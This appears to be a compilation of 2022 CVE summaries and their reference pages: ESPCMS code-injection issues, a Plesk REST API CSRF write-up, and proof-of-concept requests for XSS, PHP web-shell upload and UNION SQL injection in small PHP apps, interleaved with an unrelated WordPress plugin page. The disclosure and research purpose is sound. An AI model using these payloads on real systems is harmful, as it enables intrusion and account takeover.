ESPCMS P8.21120101 was discovered to contain a remote code execution (RCE) vulnerability in the component UPFILE_PIC_ZOOM_HIGHT.

**关于我们****EARCLINK核心团队拥有超过15年的互联网工作经验，拥有十分丰富的互联网产品开发经验**

易思ESPCMS-P8企业建站管理系统采用PHP+MySQL组合开发，采用代码和模板分离技术，模板制作者无需关注程序的开发，即使新手也很容易管理网站。底层结构技术保证了系统的稳定、易用性，想要二次开发也更加容易！

了解更多

CVE-2022-44087: 易思ESPCMS-P8企业建站管理系统，为您构建专业强大的企业建站平台

ESPCMS P8.21120101 was discovered to contain a remote code execution (RCE) vulnerability in the component IS_GETCACHE.

Here I choose the latest version downloaded from the official website,Because I found that the gitee version is not the latest version.

The official url is https://www.ecisp.cn/html/cn/download\_espcms/.

!\[输入图片说明\](https://foruda.gitee.com/images/1666256360152159022/4199ba9c\_9100358.png "屏幕截图")

login in to the manage background,and use below function

!\[输入图片说明\](https://foruda.gitee.com/images/1666256385088130346/aea073a3\_9100358.png "屏幕截图")

Use burpsuite ,and then modify the requests.

There we modify the IS\_GETCACHE from 1 to 1,);phpinfo();/\*

!\[输入图片说明\](https://foruda.gitee.com/images/1666256422108162104/fecd2a9d\_9100358.png "屏幕截图")

Then we see the below php file was modifyed by us,and we visit it

!\[输入图片说明\](https://foruda.gitee.com/images/1666256462237376525/b642fd7b\_9100358.png "屏幕截图")

!\[输入图片说明\](https://foruda.gitee.com/images/1666256483443571910/c7039e75\_9100358.png "屏幕截图")

This vulnerability is similar to the previous one(#I5WSA0:There is a Remote Code Execution after login Manage background)

There are two other places where this vulnerability exists

!\[输入图片说明\](https://foruda.gitee.com/images/1666257037761402319/f9a7ef8a\_9100358.png "屏幕截图")

!\[输入图片说明\](https://foruda.gitee.com/images/1666257067546319506/b25b69ae\_9100358.png "屏幕截图")

CVE-2022-44089: There is another Remote Code Execution after login Manage background · Issue #I5WSQ1 · 轻舞飞沙/易思ESPCMS-P8企业建站管理系统 - Gitee.com

ESPCMS P8.21120101 was discovered to contain a remote code execution (RCE) vulnerability in the component INPUT_ISDESCRIPTION.

**There is another Remote Code Execution after login Manage background**

待办的

azraelxuemo

创建于  

2022-10-20 16:55

Here I choose the latest version downloaded from the official website,Because I found that the gitee version is not the latest version.  
The official url is https://www.ecisp.cn/html/cn/download\_espcms/.  
  
login in to the manage background,and use below function  
  
Use burpsuite ,and then modify the requests.  
There we modify the INPUT\_ISDESCRIPTION from 200 to 200,);phpinfo();/\*  
  
Then we see the below php file was modifyed by us,and we visit it  
  
  
This vulnerability is similar to the previous one(#I5WSA0:There is a Remote Code Execution after login Manage background)

**评论 (0)**

azraelxuemo 创建了**任务**

登录 后才可以发表评论

CVE-2022-44088: There is another Remote Code Execution after login Manage background · Issue #I5WSND · 轻舞飞沙/易思ESPCMS-P8企业建站管理系统 - Gitee.com

Plesk Obsidian allows a CSRF attack, e.g., via the /api/v2/cli/commands REST API to change an Admin password. NOTE: Obsidian is a specific version of the Plesk product: version numbers were used through version 12, and then the convention was changed so that versions are identified by names ("Obsidian"), not numbers.

Plesk Dashboard

**INTRO**

Plesk is a commercial web hosting and server data center automation software developed for Linux and Windows-based retail hosting service providers. It’s the main choice of web hosting providers these days being used by 86.7% of the websites that use a web panel for administration. This is 4.4% of all websites and there around 2M Plesk installations in the US alone. As expected there are many interesting features to attack as an administrator, however we couldn’t find anything really exploitable and also it isn’t that interesting to begin with, if you’re already an administrator, right? We tried to see if we can escalate our privileges from one of the limited roles, but these seem solid. In the end we discovered a cookieless CSRF, which is basically a design issue in this case, because it affects all the POST requests and we could abuse most of the APIs with it.

Generally speaking, it’s obvious that Plesk has been through quite a few pentests and overall has a good security posture. The last thing we wanted to focus our attention on was the REST API. We were wondering, has the REST API the same level of security as the other Plesk components? Also we need to mention that the source code Plesk is highly obfuscated with a custom PHP extension.

**Misconfigured CORS policy**

While reviewing the REST API, we quickly noticed that there was a completely open CORS policy:

Using a wildcard to allow everything

So, we thought, wow this is definitely a good sign and we were on the right track testing the REST API. This will basically allow us to send any request with any methods/headers from any origin and read the response back. Or so we thought.

**Cookieless CSRF #1 – add secret token**

The administrator can call the REST APIs from the browser and there’s no CSRF protection either (partially correct as you will see next). Let’s try to CSRF an Administrator then. But what API endpoint shall we target? After reviewing the REST API, we discovered that there is the /api/v2/auth/keys endpoint which we thought of abusing by adding a secret key to give us admin access.

API endpoint to add a secret key for Administrator

This key will allow us to authenticate and call any endpoints after that, no more CSRF needed 🙂 Perform CSRF once, add a backdoor token and get full access forever. Sweet, let’s try this.

CSRF first attempt failed

We have used Burp’s CSRF POC generator and it seems that the request fails due to “=” added at the end, the server can’t parse this JSON. This was no big issue, this old dog knows some old tricks and by reformatting our payload a bit we were able to generate a valid JSON.

Name field of the input will hold most of the JSON field

The input’s name is html encoded and basically decodes to the following. The input’s value field will hold ‘test”}’ so that when it’s concatenated with the name it will result in a valid JSON payload. Nothing new here.

Name field html decoded

Now we were able to create a valid CSRF payload and generate a secret key as you can see bellow. We also have a miconsfigured CORS policy, so we can steal it, right?

CSRF attack on the Administrator

Well, not really. What we’ve missed initially is that the Authorization header gets added automatically by the browser when using an html form to perform the CSRF attack using the POST method. However, when using the javascript XHR object to create the same request and get the token from the response, the Authorization header isn’t added anymore. Bummer, our CSRF fails in this case as we can’t read the key! But wait, there’s still some hope left. Maybe we can find some other REST endpoints where we can trigger a CSRF attack using HTML forms (POST based) that will be impactful enough to give an attacker what they need without reading the response. And we sure found quite a few of these endpoints that we’ve exploited with various degree of severity as you’ll see next.

**Cookieless CSRF #2 – add DB user**

We found a REST endpoint that allows us to add a db user which can connect from ANY remote host to ANY database.

Add DB user (CSRF-able)

Result looks like bellow:

DB user added

We thought of injecting an UDF for a quick RCE, however the mysql port is not accessible. Lesson learned, check the port first.

Mysql port filtered

**Cookieless CSRF #3 – add FTP user**

We managed to add a new FTP user with access to any existing domain we wanted.

Add FTP user (CSRF-able)

This actually worked, you can connect via FTP, inspect the client’s home dir and conduct further attacks from there.

FTP connect OK

**Cookieless CSRF #3 – add a malicious Plesk extension**

We didn’t know what Plesk extensions were initially, so we did some quick research, backdoored an existing one and added it via CSRF upload using the REST API

Plesk malicious extension added via CSRF in the REST API

The problem was that you still need to authenticate in Plesk to access the backdoored extension. Certainly there must be an easier way, right?

**Cookieless CSRF #4 – compromise the admin**

Plesk implements some custom commands internally (a “command” is an abrastraction layer if you will in the code which calls various cli tools to do the heavy lifting) in order to manage the server as you can see bellow. One of these, is the “admin” command that allows you to do multiple things, including changing the Administrator’s password.

Plesk custom commands callable via REST API

And that is exactly what we needed. We ended up compromising Plesk via its REST API (CSRF) and change the Admin’s password. Game over!

CSRF-ing the Administrator to change his password.

The documentation around this feature isn’t great so it took a while to figure out the above payload. All POST requests can be CSRF-ed , because the browser adds the Authorization header automatically when using html forms. We noticed that there is a common misconception that an application using the Authorization header is protected against CSRF. As long as you don’t have to read the response back using javascript everything just works.

**Timeline**

10/05/22 FORTBRIDGE reaches out to PLESK for vuln disclosure

11/05/22 Plesk confirms receipt and starts investigation

19/05/22 Plesk confirms the vulnerability and starts working on a fix, no ETA offered

03/06/22 Plesk fixes the issue, but requests _delaying_ the disclosure, FORTBRIDGE accepts

25/07/22 FORTBRIDGE requests update on the patching progress

27/07/22 Plesk requests _delaying_ the disclosure again, FORTBRIDGE accepts

03/08/22 Plesk estimates “no longer than 2 weeks” for disclosure

16/09/22 FORTBRIDGE requests update

16/09/22 Plesk requests _delaying_ the disclosure, FORTBRIDGE agrees to delay 2 months max

08/11/22 FORTBRIDGE releases blogpost with technical details of the Plesk Admin takeover issue

**References**

RCE & Privesc in cPanel/WHM

Mass account takeover in Yunmai smartscale by abusing the REST API

CSRF POCs sent to Plesk

**About Post Author**

CVE-2022-45130: Compromising Plesk via its REST API

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /odlms//classes/Master.php?f=delete_activity.

CVE-2022-43058

FeehiCMS v2.1.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the id parameter at /web/admin/index.php?r=log%2Fview-layer.

**FeehiCMS is vulnerable to Cross-Site Scripting (XSS)**

Moderate severity GitHub Reviewed Published Nov 9, 2022 • Updated Nov 10, 2022

GHSA-3ppm-fwhm-qqg6: FeehiCMS is vulnerable to Cross-Site Scripting (XSS)

Auth. (subscriber+) Arbitrary Options Update vulnerability in Zoho CRM Lead Magnet plugin <= 1.7.5.8 on WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Websites are one of the most important sources of leads for your business. That means your CRM system should be well integrated with your website to contextually capture each and every visitor to turn them into a lead.

Introducing the Zoho CRM Lead Magnet plugin for WordPress. This lets you create webforms, embed them in your website, and automatically capture leads directly into your CRM with zero attenuation.

Not only is the integration easy to set-up but it’s also easy on your wallet.

**Overall usage flow**

1.  Install the Zoho CRM forms plugin from the WordPress plugin Marketplace.
2.  Create a form using Zoho CRM webforms or Contact form 7 plugin.
3.  Configure the settings for your form.
4.  Use the short code to embed the form.
5.  A prospect’s information is automatically captured upon entering your site. All that’s left is lead nurturing.

For businesses that want to maximize their websites, the Zoho CRM Lead Capture plugin for WordPress CMS is an ideal solution.

**Key features**

Two forms, one solution

This plugin works well with forms created using Zoho CRM and Contact 7 Form plugin.

Light on code

Creating a form is incredibly simple and the entire process of establishing an integration involves a few drag-drops and copy-pastes. Simply create, embed, and capture.

  Capture leads and more

Using this plugin not only lets you capture leads but also additional custom modules you create for unique business needs.

  Capture. nurture. win.

The Information entered in a website’s form is automatically pushed into Zoho CRM with zero attenuation. Now you never miss out on another lead. 

Light on your purse

The plugin is absolutely free of cost. No hidden fees, no additional costs. All you need is a website hosted with WordPress and a Zoho CRM account.

Special mail-tags support

1.  \[\_url\]
2.  \[\_site\_title\]
3.  \[\_site\_description\]
4.  \[\_site\_url\]

For examples  
\[hidden get-url default:\_url\]  
\[hidden site\_title default:\_site\_title\]  
\[hidden site-description default:\_site\_description\]  
\[hidden site-url default:\_site\_url\]

Please feel free to contact us for any further assistance: **support@zohoextensions.com**

1.  Install the WordPress plugin from WordPress Marketplace. Upload the plugin folder to the /wp-content/plugins/ directory or install via the Add New Plugin menu.
2.  Activate the plugin through the ‘Plugins’ menu in WordPress.
3.  Once you activate your Zoho CRM forms plugin, you’ll be asked to authenticate access from Zoho CRM. To do that, simply  enter the username and password of your CRM account.

The plugin installation is now complete and the integration between Zoho CRM forms and WordPress is established.

How to download the old versions of this plugin

I discourage anyone from using this plugin. When it works, it does what it should. When it breaks, don't rely on Zoho for support. During two years of using the plugin, I've repeatedly been told by Zoho that it is simply not a Zoho product. Of course, it is managed and produced by the Zoho extensions team. And of course, occasionally I find someone at the Zoho Extensions team with time to investigate issues with this plugin, obviating the false claim from Zoho support teams that this is not a Zoho product. Three years after launch the plugin only has 3000 documented installations, which falls well below the threshold for user interest that would encourage reliable developer support. Zoho CRM email parsers not quite as efficient to set up, but if they break, they do not break functionality of live Webforms. I'll probably work with Zoho to fix whatever is broken in this, but more likely I'll be moving all my forms to an email parser for CRM integration.

Hi. I have this issue in Wordpress after installing the plugin Zoho CRM Lead Magnet in WP I have entered the Domain zoho.in, my Client Id and Client secret and when I click Authenticate Zoho CRM button I’m redirected to Zoho Accounts where I enter username/password but after that I get this error message “invalid\_redirect\_uri”. Thank you!

select { height: auto !important; } Are you kidding me? You singlehandedly destroyed all the selects on my website. Couldn't you just wrap your elements in some id or class?

It works really well with Contact Form 7 and Elementor together.

Using the forms as provided by Zoho. Anytime I attempt to submit Zoho forms, I get the following message: "Sorry, there were some issues in submitting your data. Please try again later"

Read all 21 reviews

“Zoho CRM Lead Magnet” is open source software. The following people have contributed to this plugin.

Contributors

*    Zoho CRM

**1.2**

*   Added: Contact form relation issue fixed.  
    1.3.1
*   Responsive issue fixed  
    1.3.2  
    Added jquery ui css file  
    1.3.4
*   Contact form hidden field issue fixed  
    1.3.5
*   jquery ui css file missing issue fixed  
    1.3.6
*   Multiselectpicklist hidden field issue fixed  
    1.4  
    Added functionality for EU Account  
    1.4.1  
    Css loading issue fixed  
    1.4.2  
    Checkbox mapping issue fixed  
    1.4.3  
    Registeration magic intergration merge issue fixed  
    1.4.4  
    We have added authorization url (https://extensions.zoho.com/plugin/wordpress/callback) and 402,403 authorization issue fixed  
    1.4.5  
    We have added authorization url (https://extensions.zoho.eu/plugin/wordpress/callback) issue fixed  
    1.4.6  
    We have added authorization url (https://extensions.zoho.eu/plugin/wordpress/callback) issue fixed  
    1.4.7  
    Code optimaztion  
    1.4.8  
    Code optimaztion  
    1.5.0  
    Specific layout issue fixed  
    1.5.1  
    Code optimaztion  
    1.5.2  
    Code optimaztion  
    1.5.3  
    Code optimaztion  
    1.5.4  
    EU Setup Authentication issue fixed  
    1.5.5  
    Field migration issue fixed  
    1.5.7  
    Added Multipicklist  
    1.5.8  
    Code optimaztion  
    1.5.9  
    Php version issue fixed  
    1.6.0  
    Code optimaztion  
    1.6.1  
    Contact form 7 captcha v3 api issue fixed  
    1.6.2  
    Contact form 7 v3 api script issue fixed  
    (Latest Contact form7 version)  
    1.6.3  
    Php Notice issue fixed  
    1.6.3  
    Php Notice issue fixed  
    1.6.6  
    Added Form Submit Logs  
    1.6.7  
    Added Form Submit Logs

1.6.8  
Custom module related issue fixed  
1.6.9  
Hidden field related issue fixed  
1.6.9.1  
Security issue fixed check\_admin\_referer  
1.6.9.2  
performance issue fixed  
1.6.9.3  
performance issue fixed  
1.6.9.4  
performance issue fixed  
1.6.9.5  
performance issue fixed  
1.6.9.6  
redirection url issue fixed  
1.6.9.7  
rewrite an arbitrary option added  
1.7.0.1  
Hidden field issue fixed  
1.7.0.2  
checkbox field issue fixed  
1.7.0.3  
Added au domain centre  
1.7.0.5  
Lead Score mapping issue fixed  
1.7.0.6  
Added in domain centre and hidden field issue fixed  
1.7.0.8  
Security issue fixed  
1.7.1.0  
Security issue fixed  
1.7.1.1  
Security issue fixed  
1.7.1.2  
Security issue fixed and latest version updated  
1.7.1.3  
added option for international telephone option  
1.7.1.4  
Modules log added  
1.7.1.5  
Modules log added  
1.7.1.6  
Loading issue fixed  
1.7.1.7  
Added user lookup  
1.7.2.0  
performance issue fixed  
1.7.2.1  
performance issue fixed  
1.7.2.5  
Security issue fixed  
1.7.2.6  
Latest wordpress version updated and Security issue fixed  
1.7.2.7  
Security issue has been fixed  
1.7.2.8  
Security issue has been fixed  
1.7.2.9  
Security issue has been fixed  
1.7.3.0  
Security issue has been fixed  
1.7.3.1  
Get-url and site description field support added  
1.7.3.2  
Special mail-tags support  
1.7.3.3  
Added: GCLID field Support in Zoho CRM for Contact Form 7.  
1.7.3.4  
Added: A new tab added in the Zoho authentication.  
1.7.3.5  
Added: webform form save script error fixed.  
1.7.3.6  
Added: performance issue fixed.  
1.7.3.7  
Added: UI changes.  
1.7.3.9  
Added: Script issue has been fixed.  
1.7.4.0  
Added:Added Authentication check.  
1.7.4.1  
Added: SSL verified issue fixed

1.7.4.4  
Added: GCLID field api issue fixed

1.7.4.5  
Added: Japan data centre authentication option added  
1.7.4.6  
Added: Multiselect hidden field issue fixed  
1.7.4.7  
Added: Api data added to logs  
1.7.4.8  
Added: Api data added to logs  
1.7.4.9  
Added: removed empty space for email id

1.7.5.1  
zcga.js file 404 issue fixed

1.7.5.2  
Added : added fetch field option in the contact form  
1.7.5.3  
Added: In Japan dc added check for email encode

1.7.5.4  
Added: Unused css removed

1.7.5.5  
Added : Select2 component z-index issue has been fixed

1.7.5.6  
Added : Unwanted Caching file has been removed

CVE-2022-41978: Zoho CRM Lead Magnet

A cross-site scripting (XSS) vulnerability in Clansphere CMS v2011.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Username parameter.

Description

A cross-site scripting (XSS) issue in the Clansphere version 2011.4 allows remote attackers to inject JavaScript via the "username" Parameter

XSS Payload: <script>alert("username\_XSS")</script>

Vulnerable Parameter: username

Steps to Reproduce the Issue: POC: https://localhost/index.php?mod=buddy&action=create&id=925872

Screenshot: POC 1  

Impact

With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.

CVE-2022-43119: POC/Create Clansphere 2011.4 "username" xss.md at main · sinemsahn/POC

Canteen Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via ip/youthappam/php_action/editFile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Canteen Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Qianxin Niu

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/youthappam/php\_action/editFile.php?id=1

Loophole location: Canteen Management System's editFile.php file exists arbitrary file upload (RCE)

Request package for file upload：‘

POST /youthappam/php\_action/editFile.php?id\=1 HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------88582622926272
Content-Length: 422
\-----------------------------88582622926272
Content-Disposition: form-data; name="old\_image"
\-----------------------------88582622926272
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------88582622926272
Content-Disposition: form-data; name="btn"
\-----------------------------88582622926272--

The files will be uploaded to this directory \\youthappam\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-43277: bug_report/RCE-1.md at main · HuahuaDaren/bug_report

Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the categoriesId parameter at /php_action/fetchSelectedCategories.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Qianxin Niu

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchSelectedCategories.php

Vulnerability location: /youthappam/php\_action/fetchSelectedCategories.php, categoriesId

dbname =youthappam,length=10

\[+\] Payload: categoriesId=-1 union select 1,database(),3,4 // Leak place ---> categoriesId

POST /youthappam/php\_action/fetchSelectedCategories.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
categoriesId=-1 union select 1,database(),3,4

Tag

#php